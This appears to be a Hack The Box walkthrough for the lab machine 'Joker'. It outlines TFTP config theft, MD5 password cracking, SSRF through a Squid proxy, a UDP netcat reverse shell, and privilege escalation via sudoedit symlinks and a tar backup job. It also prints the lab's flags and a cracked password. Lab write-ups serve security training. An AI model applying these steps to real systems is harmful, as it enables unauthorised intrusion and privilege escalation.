Joker

Joker - 10.10.10.21

Target Enumeration:

OS: Linux

IP: 10.10.10.21

User: a298121179fe93f2978d3337dbd7057b

Root: d452b7faf5fd5b30210f340ef1d4146e

Ports / Services / Software Versions Running

22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1

3128/tcp open http-proxy Squid http proxy 3.5.12

Replicating the exploit:

Nmap

UDP

Result from firefox 3128

Configure squid in foxyproxy and browse to the port

Tried default creds no luck

Login via tftp from UDP and search for config files

File is downloaded to our system

Remove all lines with a #

cat squid.conf | grep -v ^\#

Filter for lines with content

cat squid.conf | grep -v ^\# | grep .

Grab password file via tftp

Passwords stored in MD5.

Crack with john.

ihateseafood (kalamari)

Now you get no prompt for a username

Go to 127.0.0.1

Server side request forgery attack

Add a upstream proxy

Configure new proxy listener as the app is not vulnerable

And send to localhost on port 80 (you dont need invisible proxy) but you may need to add it just to make it work.

Browse to 127.0.0.1 URL and you have the same. Now use dirsearch.py to find the directory you need.

Git clone https://github.com/maurosoria/dirsearch‚Äč

Python3 dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://127.0.0.1 -e php -t 20

Eventually you get /console

Run some system commands and try to get a reverse shell

Does not work. Suggests a firewall issue

Ping our machine with TCPdump listening

Which works

Find firewall rules

Check local firewall rules and base64 encode them without wrapping.

Copy and decode by putting string into a file

UDP is allowed so now do a reverse shell with nc -u Start up a listener in UDP mode

Send udp shell

Now you have a shell

Get a better shell

Check sudo -l

Also checked

Searchsploit sudo version

Checking this file:

Generate SSH key on kali

Create a symlink to alekos ssh keys

Edit file with sudoedit

Generate a ssh key so you can login to the system and edit files with a proper terminal.

Copy key to clipboard and paste into the layout.html with sudoedit

Another way is to sudoedit -u alekos /var/www/ .ssh/authorized_keys /layout.html which edits 3 files at oncels

Exit and save the file

SSH into box with new key

User.txt: a298121179fe93f2978d3337dbd7057b Privilege Escalation

Navigate to the /home/alekos/backups dir and list it and you will see all files are being backed up every 5 minutes

Mkdir extracted & cd extracted

Tar -xvf ../dev-1511680202.tar.gz

Shows the development folder being backed up every 5 mins

To get the root flag

Create a symlink

Wait 5 minutes and copy and extract the latest dev* and unzip it and you will get the root flag.

Second way

Create shell.sh

Make the file executable:

Set up a nc listener and wait to get root on port 8082